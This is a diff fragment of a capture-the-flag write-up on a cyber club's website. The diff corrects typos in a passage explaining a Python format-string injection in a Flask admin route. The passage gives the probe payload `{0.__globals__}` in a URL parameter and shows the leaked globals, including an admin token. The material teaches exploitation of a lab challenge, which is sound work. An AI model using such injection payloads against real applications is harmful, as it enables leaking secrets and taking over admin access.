MQCybersec/mqcybersec-website/src/content/writeups/25-pwnmequals-saymyname.md

     return render_template('admin.html', cmd=f"{prompt if prompt else 'prompt$/>'}{run_cmd()}".format(run_cmd))
 ```

-The `return render_template(...)` line has a Python format string vulnerability, as the string is a format string (indicated by the `f` at the start) and is then run with a `.format()`, meaning we can injection our own variables and potentially exfiltrate sensitive information.
+The `return render_template(...)` line has a Python format string vulnerability, as the string is a format string (indicated by the `f` at the start) and is then run with a `.format()`, meaning we can inject our own variables and potentially exfiltrate sensitive information.

 I start with some simple payloads to test it: `{0.__globals__}`

 We can send this on the `prompt` attribute on localhost to test: `http://localhost/admin?prompt={0.__globals__}`

-This returns the globals of the current exection:
+This returns the globals of the current execution:

 ```
  {'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': <_frozen_importlib_external.SourceFileLoader object at 0x7ff98d7d2220>, '__spec__': None, '__annotations__': {}, '__builtins__': <module 'builtins' (built-in)>, '__file__': '/app/app.py', '__cached__': None, 'Flask': <class 'flask.app.Flask'>, 'render_template': <function render_template at 0x7ff98c419040>, 'request': <Request 'http://localhost:5000/admin?prompt={0.__globals__}' [GET]>, 'Response': <class 'flask.wrappers.Response'>, 'redirect': <function redirect at 0x7ff98c5ac0d0>, 'url_for': <function url_for at 0x7ff98c618e50>, 'visit_report': <function visit_report at 0x7ff98c3dd670>, 'token_hex': <function token_hex at 0x7ff98c9ec940>, 'X_Admin_Token': '68fd3889bf98101b1639d81d8428955d', 'run_cmd': <function run_cmd at 0x7ff98d81d040>, 'sanitize_input': <function sanitize_input at 0x7ff98c0a9940>, 'app': <Flask 'app'>, 'admin': <function admin at 0x7ff98c1629d0>, 'index': <function index at 0x7ff98c162a60>, 'your_name': <function your_name at 0x7ff98c162c10>, 'report': <function report at 0x7ff98c162ca0>}None